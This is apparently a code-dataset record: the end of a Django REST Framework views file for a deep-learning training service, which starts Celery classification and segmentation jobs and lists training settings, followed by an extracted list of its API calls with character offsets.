                    hyperparams[p.name] = p.default

            # Overwrite hyperparams with ones provided by the user
            props = serializer.data['properties']
            for p in props:
                ts = models.TrainingSetting()
                # Get the property by name
                name = p['name']
                # Match both underscore and space spellings of the property name
                name = [name, name.replace('_', ' ')]
                queryset = models.Property.objects.filter(Q(name__icontains=name[0]) | Q(name__icontains=name[1]))
                if len(queryset) == 0:
                    # Property does not exist, delete the weight and its associated properties (cascade)
                    weight.delete()
                    error = {"Error": f"Property `{p['name']}` does not exist"}
                    return Response(error, status=status.HTTP_400_BAD_REQUEST)
                property = queryset[0]
                # Persist the user-chosen value for this training run
                ts.property_id = property
                ts.modelweights_id = weight
                ts.value = str(p['value'])
                ts.save()
                hyperparams[property.name] = ts.value

            # Build the configuration handed to the deep-learning backend
            config = nn_settings(modelweight=weight, hyperparams=hyperparams)
            if not config:
                return Response({"Error": "Properties error"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)

            # Differentiate the task and start training
            if task_name == 'classification':
                celery_id = classification.classificate.delay(config)
                # celery_id = classification.classificate(config)
            elif task_name == 'segmentation':
                celery_id = segmentation.segment.delay(config)
                # celery_id = segmentation.segment(config)
            else:
                return Response({'error': 'error on task'}, status=status.HTTP_400_BAD_REQUEST)

            # Store the Celery task id so the process can be tracked/stopped later
            weight = models.ModelWeights.objects.get(id=weight.id)
            weight.celery_id = celery_id.id
            weight.save()

            # todo what if project already has a modelweight?
            # Training started, store the training in project
            project.modelweights_id = weight
            project.save()

            response = {
                "result": "ok",
                "process_id": celery_id.id,
                "weight_id": weight.id
            }
            return Response(response, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TrainingSettingViewSet(BAMixins.ParamListModelMixin,
                             viewsets.GenericViewSet):
    # Exposes the value a property took during a specific training run.
    serializer_class = serializers.TrainingSettingSerializer
    queryset = models.TrainingSetting.objects.all()
    # Query-string parameters required by ParamListModelMixin
    params = ['modelweights_id', 'property_id']

    def get_queryset(self):
        """Restrict the queryset to the (modelweights_id, property_id) pair."""
        query = self.request.query_params
        self.queryset = models.TrainingSetting.objects.filter(
            modelweights_id=query.get('modelweights_id'),
            property_id=query.get('property_id'))
        return self.queryset

    @swagger_auto_schema(manual_parameters=[
        openapi.Parameter('modelweights_id', openapi.IN_QUERY, "Integer representing a ModelWeights",
                          required=True, type=openapi.TYPE_INTEGER),
        openapi.Parameter('property_id', openapi.IN_QUERY, "Integer representing a Property",
                          required=True, type=openapi.TYPE_INTEGER),
    ])
    def list(self, request, *args, **kwargs):
        """Returns settings used for a training

        This API returns the value used for a property in a specific training
        (a modelweights). It requires a `modelweights_id`, indicating a
        training process, and a `property_id`.
        """
        return super().list(request, *args, **kwargs)
| [
"backend_app.models.Model.objects.filter",
"backend_app.models.Project.objects.filter",
"numpy.trunc",
"drf_yasg.utils.swagger_auto_schema",
"backend_app.models.Project.objects.get",
"yaml.load",
"backend_app.models.AllowedProperty.objects.all",
"backend_app.models.TrainingSetting",
"backend_app.mod... | [((816, 852), 'backend_app.models.AllowedProperty.objects.all', 'models.AllowedProperty.objects.all', ([], {}), '()\n', (850, 852), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((2601, 2653), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'is_single_image': '(False)'}), '(is_single_image=False)\n', (2630, 2653), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((3624, 3693), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'responses': 'swagger.DatasetViewSet_create_response'}), '(responses=swagger.DatasetViewSet_create_response)\n', (3643, 3693), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((5697, 5812), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.InferenceSerializer', 'responses': 'swagger.inferences_post_responses'}), '(request_body=serializers.InferenceSerializer, responses\n =swagger.inferences_post_responses)\n', (5716, 5812), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((6373, 6493), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.InferenceSingleSerializer', 'responses': 'swagger.inferences_post_responses'}), '(request_body=serializers.InferenceSingleSerializer,\n responses=swagger.inferences_post_responses)\n', (6392, 6493), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((8546, 8572), 'backend_app.models.Model.objects.all', 'models.Model.objects.all', ([], {}), '()\n', (8570, 8572), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((9741, 9774), 'backend_app.models.ModelWeights.objects.all', 'models.ModelWeights.objects.all', ([], {}), '()\n', (9772, 9774), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((12362, 12399), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], 
{'auto_schema': 'None'}), '(auto_schema=None)\n', (12381, 12399), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((15424, 15452), 'backend_app.models.Project.objects.all', 'models.Project.objects.all', ([], {}), '()\n', (15450, 15452), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16072, 16141), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'responses': 'swagger.ProjectViewSet_create_response'}), '(responses=swagger.ProjectViewSet_create_response)\n', (16091, 16141), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((17116, 17153), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'auto_schema': 'None'}), '(auto_schema=None)\n', (17135, 17153), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((17433, 17462), 'backend_app.models.Property.objects.all', 'models.Property.objects.all', ([], {}), '()\n', (17460, 17462), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((20989, 21112), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.StopProcessSerializer', 'responses': 'swagger.StopProcessViewSet_post_response'}), '(request_body=serializers.StopProcessSerializer,\n responses=swagger.StopProcessViewSet_post_response)\n', (21008, 21112), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((23022, 23047), 'backend_app.models.Task.objects.all', 'models.Task.objects.all', ([], {}), '()\n', (23045, 23047), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((23424, 23536), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.TrainSerializer', 'responses': 'swagger.TrainViewSet_post_response'}), '(request_body=serializers.TrainSerializer, responses=\n swagger.TrainViewSet_post_response)\n', (23443, 23536), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((29642, 29678), 
'backend_app.models.TrainingSetting.objects.all', 'models.TrainingSetting.objects.all', ([], {}), '()\n', (29676, 29678), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((1136, 1222), 'backend_app.models.AllowedProperty.objects.filter', 'models.AllowedProperty.objects.filter', ([], {'model_id': 'model_id', 'property_id': 'property_id'}), '(model_id=model_id, property_id=\n property_id)\n', (1173, 1222), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((5578, 5650), 'rest_framework.response.Response', 'Response', (["{'error': 'URL malformed'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)\n", (5586, 5650), False, 'from rest_framework.response import Response\n'), ((6106, 6156), 'backend_app.serializers.InferenceSerializer', 'serializers.InferenceSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (6137, 6156), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((6257, 6320), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (6265, 6320), False, 'from rest_framework.response import Response\n'), ((6845, 6901), 'backend_app.serializers.InferenceSingleSerializer', 'serializers.InferenceSingleSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (6882, 6901), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((8378, 8441), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (8386, 8441), False, 'from rest_framework.response import Response\n'), ((12060, 12123), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), 
'(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (12068, 12123), False, 'from rest_framework.response import Response\n'), ((13714, 13767), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (13745, 13767), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((15130, 15175), 'rest_framework.response.Response', 'Response', (['response'], {'status': 'status.HTTP_200_OK'}), '(response, status=status.HTTP_200_OK)\n', (15138, 15175), False, 'from rest_framework.response import Response\n'), ((16617, 16674), 'backend_app.serializers.ProjectSerializer', 'serializers.ProjectSerializer', (['project'], {'data': 'request.data'}), '(project, data=request.data)\n', (16646, 16674), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16831, 16894), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (16839, 16894), False, 'from rest_framework.response import Response\n'), ((20895, 20940), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_200_OK'}), '(data=res, status=status.HTTP_200_OK)\n', (20903, 20940), False, 'from rest_framework.response import Response\n'), ((21383, 21435), 'backend_app.serializers.StopProcessSerializer', 'serializers.StopProcessSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (21416, 21435), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22856, 22919), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (22864, 22919), False, 'from rest_framework.response import Response\n'), ((23969, 24015), 'backend_app.serializers.TrainSerializer', 
'serializers.TrainSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (23996, 24015), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((29447, 29510), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (29455, 29510), False, 'from rest_framework.response import Response\n'), ((29983, 30082), 'backend_app.models.TrainingSetting.objects.filter', 'models.TrainingSetting.objects.filter', ([], {'modelweights_id': 'modelweights_id', 'property_id': 'property_id'}), '(modelweights_id=modelweights_id,\n property_id=property_id)\n', (30020, 30082), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((2843, 2912), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'task_id': 'task_id', 'is_single_image': '(False)'}), '(task_id=task_id, is_single_image=False)\n', (2872, 2912), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((4207, 4315), 'rest_framework.response.Response', 'Response', (["{'error': 'Validation error. Request data is malformed.'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'Validation error. 
Request data is malformed.'}, status=\n status.HTTP_400_BAD_REQUEST)\n", (4215, 4315), False, 'from rest_framework.response import Response\n'), ((4649, 4757), 'rest_framework.response.Response', 'Response', (["{'error': f'The dataset `{dataset_name}` already exists'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': f'The dataset `{dataset_name}` already exists'}, status=\n status.HTTP_400_BAD_REQUEST)\n", (4657, 4757), False, 'from rest_framework.response import Response\n'), ((4810, 4849), 'requests.get', 'requests.get', (['url'], {'allow_redirects': '(True)'}), '(url, allow_redirects=True)\n', (4822, 4849), False, 'import requests\n'), ((6211, 6241), 'backend_app.utils.do_inference', 'utils.do_inference', (['serializer'], {}), '(serializer)\n', (6229, 6241), False, 'from backend_app import utils\n'), ((7540, 7636), 'backend_app.models.Dataset', 'models.Dataset', ([], {'name': 'f"""single-image-dataset"""', 'task_id': 'task_id', 'path': '""""""', 'is_single_image': '(True)'}), "(name=f'single-image-dataset', task_id=task_id, path='',\n is_single_image=True)\n", (7554, 7636), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((8332, 8362), 'backend_app.utils.do_inference', 'utils.do_inference', (['serializer'], {}), '(serializer)\n', (8350, 8362), False, 'from backend_app import utils\n'), ((8760, 8804), 'backend_app.models.Model.objects.filter', 'models.Model.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (8787, 8804), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((10015, 10068), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'model_id': 'model_id'}), '(model_id=model_id)\n', (10049, 10068), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((11071, 11109), 'backend_app.models.ModelWeights.objects.get', 'models.ModelWeights.objects.get', ([], {'id': 'id'}), '(id=id)\n', 
(11102, 11109), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((11525, 11581), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (11533, 11581), False, 'from rest_framework.response import Response\n'), ((11803, 11863), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'model_id': 'weight.model_id'}), '(model_id=weight.model_id)\n', (11837, 11863), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((12019, 12044), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (12027, 12044), False, 'from rest_framework.response import Response\n'), ((12622, 12651), 'numpy.trunc', 'np.trunc', (['(values * 10 ** decs)'], {}), '(values * 10 ** decs)\n', (12630, 12651), True, 'import numpy as np\n'), ((13576, 13632), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (13584, 13632), False, 'from rest_framework.response import Response\n'), ((13868, 13979), 'rest_framework.response.Response', 'Response', (["{'result': 'Process stopped before finishing or non existing.'}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'result': 'Process stopped before finishing or non existing.'},\n status=status.HTTP_404_NOT_FOUND)\n", (13876, 13979), False, 'from rest_framework.response import Response\n'), ((14080, 14186), 'rest_framework.response.Response', 'Response', (["{'result': 'Process in execution. Try later for output results.'}"], {'status': 'status.HTTP_200_OK'}), "({'result': 'Process in execution. 
Try later for output results.'},\n status=status.HTTP_200_OK)\n", (14088, 14186), False, 'from rest_framework.response import Response\n'), ((14340, 14436), 'rest_framework.response.Response', 'Response', (["{'result': 'Output file not found'}"], {'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), "({'result': 'Output file not found'}, status=status.\n HTTP_500_INTERNAL_SERVER_ERROR)\n", (14348, 14436), False, 'from rest_framework.response import Response\n'), ((14455, 14501), 'os.path.join', 'opjoin', (['settings.OUTPUTS_DIR', 'infer.outputfile'], {}), '(settings.OUTPUTS_DIR, infer.outputfile)\n', (14461, 14501), True, 'from os.path import join as opjoin\n'), ((15566, 15599), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': 'id'}), '(id=id)\n', (15592, 15599), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16539, 16595), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (16547, 16595), False, 'from rest_framework.response import Response\n'), ((19397, 19453), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (19405, 19453), False, 'from rest_framework.response import Response\n'), ((21547, 21603), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (21581, 21603), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((21624, 21677), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (21655, 21677), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22795, 22840), 'rest_framework.response.Response', 
'Response', (['response'], {'status': 'status.HTTP_200_OK'}), '(response, status=status.HTTP_200_OK)\n', (22803, 22840), False, 'from rest_framework.response import Response\n'), ((24131, 24152), 'backend_app.models.ModelWeights', 'models.ModelWeights', ([], {}), '()\n', (24150, 24152), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((25391, 25451), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': "serializer.data['project_id']"}), "(id=serializer.data['project_id'])\n", (25417, 25451), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26199, 26237), 'os.path.join', 'opjoin', (['settings.TRAINING_DIR', '"""ckpts"""'], {}), "(settings.TRAINING_DIR, 'ckpts')\n", (26205, 26237), True, 'from os.path import join as opjoin\n'), ((26630, 26696), 'backend_app.models.AllowedProperty.objects.filter', 'models.AllowedProperty.objects.filter', ([], {'model_id': 'weight.model_id_id'}), '(model_id=weight.model_id_id)\n', (26667, 26696), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26942, 26971), 'backend_app.models.Property.objects.all', 'models.Property.objects.all', ([], {}), '()\n', (26969, 26971), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((28158, 28214), 'deeplearning.utils.nn_settings', 'nn_settings', ([], {'modelweight': 'weight', 'hyperparams': 'hyperparams'}), '(modelweight=weight, hyperparams=hyperparams)\n', (28169, 28214), False, 'from deeplearning.utils import nn_settings\n'), ((28894, 28939), 'backend_app.models.ModelWeights.objects.get', 'models.ModelWeights.objects.get', ([], {'id': 'weight.id'}), '(id=weight.id)\n', (28925, 28939), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((29381, 29431), 'rest_framework.response.Response', 'Response', (['response'], {'status': 'status.HTTP_201_CREATED'}), '(response, 
status=status.HTTP_201_CREATED)\n', (29389, 29431), False, 'from rest_framework.response import Response\n'), ((1301, 1426), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""model_id"""', 'openapi.IN_QUERY', '"""Integer representing a model"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('model_id', openapi.IN_QUERY,\n 'Integer representing a model', required=True, type=openapi.TYPE_INTEGER)\n", (1318, 1426), False, 'from drf_yasg import openapi\n'), ((1496, 1632), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""property_id"""', 'openapi.IN_QUERY', '"""Integer representing a property"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('property_id', openapi.IN_QUERY,\n 'Integer representing a property', required=True, type=openapi.TYPE_INTEGER\n )\n", (1513, 1632), False, 'from drf_yasg import openapi\n'), ((3073, 3166), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""task_id"""', 'openapi.IN_QUERY'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('task_id', openapi.IN_QUERY, type=openapi.TYPE_INTEGER,\n required=False)\n", (3090, 3166), False, 'from drf_yasg import openapi\n'), ((4568, 4619), 'pathlib.Path', 'Path', (['f"""{settings.DATASETS_DIR}/{dataset_name}.yml"""'], {}), "(f'{settings.DATASETS_DIR}/{dataset_name}.yml')\n", (4572, 4619), False, 'from pathlib import Path\n'), ((4918, 4962), 'yaml.load', 'yaml.load', (['r.content'], {'Loader': 'yaml.FullLoader'}), '(r.content, Loader=yaml.FullLoader)\n', (4927, 4962), False, 'import yaml\n'), ((5315, 5389), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED', 'headers': 'headers'}), '(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n', (5323, 5389), False, 'from rest_framework.response import Response\n'), ((5490, 5562), 'rest_framework.response.Response', 'Response', (["{'error': 'URL malformed'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'URL malformed'}, 
status=status.HTTP_400_BAD_REQUEST)\n", (5498, 5562), False, 'from rest_framework.response import Response\n'), ((7087, 7128), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': 'project_id'}), '(id=project_id)\n', (7113, 7128), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((7702, 7750), 'yaml.load', 'yaml.load', (['dummy_dataset'], {'Loader': 'yaml.FullLoader'}), '(dummy_dataset, Loader=yaml.FullLoader)\n', (7711, 7750), False, 'import yaml\n'), ((8057, 8123), 'yaml.dump', 'yaml.dump', (['yaml_content', 'f'], {'Dumper': 'utils.MyDumper', 'sort_keys': '(False)'}), '(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)\n', (8066, 8123), False, 'import yaml\n'), ((8888, 9037), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""task_id"""', 'openapi.IN_QUERY', '"""Integer for filtering the models based on task."""'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('task_id', openapi.IN_QUERY,\n 'Integer for filtering the models based on task.', type=openapi.\n TYPE_INTEGER, required=False)\n", (8905, 9037), False, 'from drf_yasg import openapi\n'), ((10237, 10393), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""model_id"""', 'openapi.IN_QUERY', '"""Return the modelweights obtained on `model_id` model."""'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('model_id', openapi.IN_QUERY,\n 'Return the modelweights obtained on `model_id` model.', type=openapi.\n TYPE_INTEGER, required=False)\n", (10254, 10393), False, 'from drf_yasg import openapi\n'), ((14016, 14039), 'celery.result.AsyncResult', 'AsyncResult', (['process_id'], {}), '(process_id)\n', (14027, 14039), False, 'from celery.result import AsyncResult\n'), ((14272, 14318), 'os.path.join', 'opjoin', (['settings.OUTPUTS_DIR', 'infer.outputfile'], {}), '(settings.OUTPUTS_DIR, infer.outputfile)\n', (14278, 14318), True, 'from os.path import join as opjoin\n'), ((12721, 12906), 
'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""process_id"""', 'openapi.IN_QUERY', '"""Pass a required UUID representing a finished process."""'], {'type': 'openapi.TYPE_STRING', 'format': 'openapi.FORMAT_UUID', 'required': '(False)'}), "('process_id', openapi.IN_QUERY,\n 'Pass a required UUID representing a finished process.', type=openapi.\n TYPE_STRING, format=openapi.FORMAT_UUID, required=False)\n", (12738, 12906), False, 'from drf_yasg import openapi\n'), ((19531, 19587), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19565, 19587), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((20071, 20123), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_404_NOT_FOUND'}), '(data=res, status=status.HTTP_404_NOT_FOUND)\n', (20079, 20123), False, 'from rest_framework.response import Response\n'), ((20422, 20486), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), '(data=res, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n', (20430, 20486), False, 'from rest_framework.response import Response\n'), ((18527, 18684), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""process_id"""', 'openapi.IN_QUERY', '"""UUID representing a process"""'], {'required': '(True)', 'type': 'openapi.TYPE_STRING', 'format': 'openapi.FORMAT_UUID'}), "('process_id', openapi.IN_QUERY,\n 'UUID representing a process', required=True, type=openapi.TYPE_STRING,\n format=openapi.FORMAT_UUID)\n", (18544, 18684), False, 'from drf_yasg import openapi\n'), ((21877, 21979), 'rest_framework.response.Response', 'Response', (["{'result': 'Process already stopped or non existing'}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'result': 'Process already stopped or non existing'}, status=\n status.HTTP_404_NOT_FOUND)\n", (21885, 21979), False, 
'from rest_framework.response import Response\n'), ((24504, 24555), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (24512, 24555), False, 'from rest_framework.response import Response\n'), ((24750, 24801), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (24758, 24801), False, 'from rest_framework.response import Response\n'), ((25022, 25073), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (25030, 25073), False, 'from rest_framework.response import Response\n'), ((25316, 25367), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (25324, 25367), False, 'from rest_framework.response import Response\n'), ((27279, 27303), 'backend_app.models.TrainingSetting', 'models.TrainingSetting', ([], {}), '()\n', (27301, 27303), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((28265, 28355), 'rest_framework.response.Response', 'Response', (["{'Error': 'Properties error'}"], {'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), "({'Error': 'Properties error'}, status=status.\n HTTP_500_INTERNAL_SERVER_ERROR)\n", (28273, 28355), False, 'from rest_framework.response import Response\n'), ((28482, 28523), 'deeplearning.tasks.classification.classificate.delay', 'classification.classificate.delay', (['config'], {}), '(config)\n', (28515, 28523), False, 'from deeplearning.tasks import classification, segmentation\n'), ((30162, 30306), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""modelweights_id"""', 'openapi.IN_QUERY', '"""Integer representing a ModelWeights"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), 
"('modelweights_id', openapi.IN_QUERY,\n 'Integer representing a ModelWeights', required=True, type=openapi.\n TYPE_INTEGER)\n", (30179, 30306), False, 'from drf_yasg import openapi\n'), ((30371, 30507), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""property_id"""', 'openapi.IN_QUERY', '"""Integer representing a Property"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('property_id', openapi.IN_QUERY,\n 'Integer representing a Property', required=True, type=openapi.TYPE_INTEGER\n )\n", (30388, 30507), False, 'from drf_yasg import openapi\n'), ((5067, 5133), 'yaml.dump', 'yaml.dump', (['yaml_content', 'f'], {'Dumper': 'utils.MyDumper', 'sort_keys': '(False)'}), '(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)\n', (5076, 5133), False, 'import yaml\n'), ((7866, 7951), 'rest_framework.response.Response', 'Response', (["{'error': 'Error in YAML parsing'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'Error in YAML parsing'}, status=status.HTTP_400_BAD_REQUEST\n )\n", (7874, 7951), False, 'from rest_framework.response import Response\n'), ((17783, 17809), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[0]'}), '(name__icontains=name[0])\n', (17784, 17809), False, 'from django.db.models import Q\n'), ((17812, 17838), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[1]'}), '(name__icontains=name[1])\n', (17813, 17838), False, 'from django.db.models import Q\n'), ((19658, 19714), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19692, 19714), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((19736, 19789), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19767, 19789), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22105, 22175), 
'backend.celery_app.control.revoke', 'celery_app.control.revoke', (['celery_id'], {'terminate': '(True)', 'signal': '"""SIGUSR1"""'}), "(celery_id, terminate=True, signal='SIGUSR1')\n", (22130, 22175), False, 'from backend import celery_app, settings\n'), ((26063, 26114), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (26071, 26114), False, 'from rest_framework.response import Response\n'), ((27836, 27887), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (27844, 27887), False, 'from rest_framework.response import Response\n'), ((28664, 28698), 'deeplearning.tasks.segmentation.segment.delay', 'segmentation.segment.delay', (['config'], {}), '(config)\n', (28690, 28698), False, 'from deeplearning.tasks import classification, segmentation\n'), ((28799, 28871), 'rest_framework.response.Response', 'Response', (["{'error': 'error on task'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'error on task'}, status=status.HTTP_400_BAD_REQUEST)\n", (28807, 28871), False, 'from rest_framework.response import Response\n'), ((19861, 19914), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19892, 19914), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22502, 22572), 'backend.celery_app.control.revoke', 'celery_app.control.revoke', (['celery_id'], {'terminate': '(True)', 'signal': '"""SIGUSR1"""'}), "(celery_id, terminate=True, 